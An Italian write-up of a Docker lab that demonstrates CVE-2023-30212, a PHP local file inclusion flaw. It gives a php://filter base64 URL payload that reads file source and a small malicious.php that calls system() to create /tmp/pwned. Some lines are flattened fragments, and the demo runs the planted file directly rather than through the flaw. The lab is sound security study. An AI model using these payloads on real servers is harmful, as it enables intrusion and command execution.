
PoC per CVE-2023-30212 usando Docker
PoC per CVE-2023-30212 usando Docker
Questo rapporto descrive la configurazione diretta di un ambiente web vulnerabile basato su Docker per la vulnerabilità CVE-2023-30212, non presente in Vulhub, e la dimostrazione della vulnerabilità tramite PoC.
php:8.1-apachevulnerable.php e malicious.php nella directory /var/www/html8088
| Nome file | Descrizione |
|---|---|
vulnerable.php | File PHP contenente la vulnerabilità LFI |
malicious.php | File PHP malevolo che esegue comandi di sistema |
docker-compose.yml | File di configurazione per il container |
Dockerfile | File di configurazione per la creazione dell'immagine Docker |




docker-compose up -d
Nome del container: cve-2023-30212-cve-lfi-1
Il server Apache viene avviato ed è accessibile su http://localhost:8088
Chiamare il seguente URL per visualizzare il contenuto di malicious.php in forma codificata base64:
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php

Decodificando l'output si ottiene il seguente codice PHP:
<?php system("touch /tmp/pwned"); ?>

Chiamare il seguente URL per eseguire effettivamente il comando:
http://localhost:8088/malicious.php
Dopo l'esecuzione del comando, dovrebbe essere creato il file /tmp/pwned.
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
Se il file pwned è presente nell'output, il test è riuscito.

php://filtersystem()/tmp/pwned che conferma il successo del PoC